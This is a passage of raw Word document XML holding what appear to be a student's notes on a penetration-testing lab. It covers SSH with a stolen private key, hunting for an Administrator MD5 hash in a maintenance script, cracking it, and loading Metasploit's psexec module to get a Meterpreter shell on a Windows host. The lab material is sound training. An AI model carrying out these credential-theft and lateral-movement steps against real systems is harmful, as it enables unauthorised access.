          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002672ED">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sudo ssh -</w:t>
      </w:r>
      <w:r w:rsidR="00C24CBE" w:rsidRPr="002672ED">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="002672ED">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~/Desktop/Private_key2 -p 22</w:t>
      </w:r>
      <w:r w:rsidR="00927D2C">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="002672ED">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2 alice-devops@172.31.55.242</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEDD080" w14:textId="0B34E5E7" w:rsidR="000E61FA" w:rsidRDefault="00201BF9" w:rsidP="00FF44C8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2190"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00201BF9">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato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0764895E" wp14:editId="17F726CF">
            <wp:extent cx="5943600" cy="3905885"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="125651522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515229" name="Picture 1" descr="A screenshot of a computer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FF6E" w14:textId="77777777" w:rsidR="001B5C55" w:rsidRPr="001B5C55" w:rsidRDefault="001B5C55" w:rsidP="001B5C55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2190"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B5C55">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hint: You will need to know which username to try and connect with. Which user did the stolen key originally belong to? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD90E27" w14:textId="77777777" w:rsidR="001B5C55" w:rsidRDefault="001B5C55" w:rsidP="001B5C55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2190"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B5C55">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note: Some SSH clients will refuse to use a key with file permissions that are too open. You will need to ensure ONLY the key file owner has read, write, or execute permissions. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4921274F" w14:textId="77777777" w:rsidR="00C24CBE" w:rsidRDefault="00C24CBE" w:rsidP="00C24CBE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2190"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D5EEA38" w14:textId="77777777" w:rsidR="00C72452" w:rsidRDefault="00C72452" w:rsidP="00C72452">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="90" w:after="90"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Challenge 4: System Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4C2069" w14:textId="77777777" w:rsidR="00C72452" w:rsidRDefault="00C72452" w:rsidP="00C72452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>With SSH access to the second Linux machine, our new goal is to find our way into the remaining Windows hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C845394" w14:textId="77777777" w:rsidR="00C72452" w:rsidRDefault="00C72452" w:rsidP="00C7245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lastRenderedPageBreak/>
        <w:t>Inexperienced or negligent developers and administrators frequently keep bad password management practices. Search for text files and scripts that might contain sensitive data, like passwords, keys, or hashes. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B874323" w14:textId="77777777" w:rsidR="00C72452" w:rsidRDefault="00C72452" w:rsidP="00C72452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ind w:left="2190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>Hint: With user-level access, it is a good idea to start by looking into that user's own files before expanding outward. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55960F96" w14:textId="77777777" w:rsidR="00C72452" w:rsidRDefault="00C72452" w:rsidP="00C7245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Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64963F2B" w14:textId="01F45B6F" w:rsidR="00C72452" w:rsidRDefault="00917532" w:rsidP="00C7245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Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00917532">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Cat windows-maintenance.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C9FD30" w14:textId="337B5C61" w:rsidR="00917532" w:rsidRDefault="00917532" w:rsidP="00C7245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Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00917532">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E93C5CA" wp14:editId="7A54F231">
            <wp:extent cx="5943600" cy="3735705"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7572313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23131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75E8B" w14:textId="77777777" w:rsidR="00C72452" w:rsidRDefault="00C72452" w:rsidP="00C7245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>Find the hash that appears to be associated with an Administrator account on a Windows machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1E35DA" w14:textId="77777777" w:rsidR="00CD09BD" w:rsidRPr="00336374" w:rsidRDefault="00CD09BD" w:rsidP="00CD09BD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2190"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00336374">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>username="Administrator"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFEEA2D" w14:textId="709FBFCE" w:rsidR="001B5C55" w:rsidRDefault="00CD09BD" w:rsidP="00CD09BD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2190"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00336374">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>password_hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00336374">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>="00bfc8c729f5d4d529a412b12c58ddd2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B88FDE3" w14:textId="77777777" w:rsidR="00401570" w:rsidRDefault="00401570" w:rsidP="00CD09BD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2190"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:eastAsia="Times New Roman" w:hAnsi="Lato" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19834CDD" w14:textId="77777777" w:rsidR="00687203" w:rsidRDefault="00687203" w:rsidP="00687203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24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F2468F9" w14:textId="77777777" w:rsidR="00AE079A" w:rsidRDefault="00AE079A" w:rsidP="00AE079A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="90" w:after="90"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Challenge 5: Password Cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DC0A6D" w14:textId="77777777" w:rsidR="00AE079A" w:rsidRDefault="00AE079A" w:rsidP="00AE079A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>With a password hash in our hands, we need to crack it to discover the actual password. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E88B5A4" w14:textId="77777777" w:rsidR="00AE079A" w:rsidRDefault="00AE079A" w:rsidP="00AE079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lastRenderedPageBreak/>
        <w:t>With any means you prefer, crack the MD5 hash you found to reveal the original password. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAD1756" w14:textId="77777777" w:rsidR="00AE079A" w:rsidRDefault="00AE079A" w:rsidP="00AE079A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ind w:left="2190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>You can crack the hash using existing tools installed in Kali. (Remember the available wordlists in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Space Grotesk" w:hAnsi="Consolas"/>
          <w:color w:val="E0061F"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="C7CDD1" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Space Grotesk" w:hAnsi="Consolas"/>
          <w:color w:val="E0061F"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="C7CDD1" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Space Grotesk" w:hAnsi="Consolas"/>
          <w:color w:val="E0061F"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="C7CDD1" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>/share/wordlists</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7465385F" w14:textId="77777777" w:rsidR="00AE079A" w:rsidRDefault="00AE079A" w:rsidP="00AE079A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ind w:left="2190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>You could write a Python script to crack it using the same wordlists as other tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3097B5" w14:textId="77777777" w:rsidR="00AE079A" w:rsidRDefault="00AE079A" w:rsidP="00AE079A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ind w:left="2190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>You can check third-party hash databases to see if it is a known hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577D6C1D" w14:textId="5C9483B1" w:rsidR="00401570" w:rsidRPr="00401570" w:rsidRDefault="00401570" w:rsidP="0040157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Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00401570">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>https://10015.io/tools/md5-encrypt-decrypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FBEB0C" w14:textId="45471D01" w:rsidR="00927D2C" w:rsidRDefault="00062DAF" w:rsidP="0040157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Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">I also ran the script </w:t>
      </w:r>
      <w:r w:rsidR="002C0DE0">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>./windows-maintenance.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E2F91E" w14:textId="7A3A3A4B" w:rsidR="002C0DE0" w:rsidRDefault="002C0DE0" w:rsidP="004963C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Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">And </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pokemon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> is correct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E3C1DD" w14:textId="0F0B59CD" w:rsidR="00401570" w:rsidRDefault="00401570" w:rsidP="0040157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Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00401570">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pokemon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004963C8">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57FF8A67" wp14:editId="5199A993">
            <wp:extent cx="1685925" cy="1685925"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1222128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7DC7A0" w14:textId="77777777" w:rsidR="002672ED" w:rsidRDefault="002672ED" w:rsidP="002672ED">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="231DC183" w14:textId="77777777" w:rsidR="00401570" w:rsidRDefault="00401570" w:rsidP="00401570">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="90" w:after="90"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Challenge 6: Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4795877F" w14:textId="77777777" w:rsidR="00401570" w:rsidRDefault="00401570" w:rsidP="00401570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>Now that we have a username and password, we need to use them to gain access to one of the Windows targets. Connecting using "legitimate" means like Remote Desktop Protocol (RDP) could be possible, but a Meterpreter shell can give us more user-friendly options to achieve our goals. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7BE2DC" w14:textId="77777777" w:rsidR="00401570" w:rsidRDefault="00401570" w:rsidP="0040157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>Start up the Metasploit framework on Kali, and load the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Space Grotesk" w:hAnsi="Consolas"/>
          <w:color w:val="E0061F"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="C7CDD1" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Space Grotesk" w:hAnsi="Consolas"/>
          <w:color w:val="E0061F"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="C7CDD1" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Space Grotesk" w:hAnsi="Consolas"/>
          <w:color w:val="E0061F"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="C7CDD1" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Space Grotesk" w:hAnsi="Consolas"/>
          <w:color w:val="E0061F"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="C7CDD1" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> exploit module. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BAF5F5" w14:textId="77777777" w:rsidR="00401570" w:rsidRDefault="00401570" w:rsidP="00401570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2190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>Note: This module is a common exploit for gaining access to Windows machines with stolen credentials. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203D2BED" w14:textId="7266B209" w:rsidR="00927D2C" w:rsidRDefault="00927D2C" w:rsidP="00927D2C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00927D2C">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Searched and used windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00927D2C">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00927D2C">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00927D2C">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="599F0A45" w14:textId="6EA81759" w:rsidR="0004442B" w:rsidRDefault="0004442B" w:rsidP="00927D2C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0004442B">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Use 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7A57EC" w14:textId="77777777" w:rsidR="00401570" w:rsidRDefault="00401570" w:rsidP="0040157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>Configure the module's options to set the username and password you found previously. You will not need to specify a domain. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A53E8D" w14:textId="2C88FBEC" w:rsidR="00927D2C" w:rsidRDefault="00927D2C" w:rsidP="00927D2C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00927D2C">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E3566E0" wp14:editId="3C156305">
            <wp:extent cx="5943600" cy="1378585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="190374611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746110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E11C" w14:textId="77777777" w:rsidR="00401570" w:rsidRDefault="00401570" w:rsidP="0040157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>Set the RHOSTS target to one of the Windows IPs you found with Nmap earlier. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D47E0FE" w14:textId="77777777" w:rsidR="00401570" w:rsidRDefault="00401570" w:rsidP="00401570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2190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>Note: These credentials will only work on one of the two Windows machines. If the exploit fails, set the other IP address as the target and try again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC7EE09" w14:textId="5D6E6D85" w:rsidR="00F63A14" w:rsidRDefault="00F63A14" w:rsidP="00927D2C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F63A14">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="706C7EF9" wp14:editId="54F7FDC3">
            <wp:extent cx="5077534" cy="1819529"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
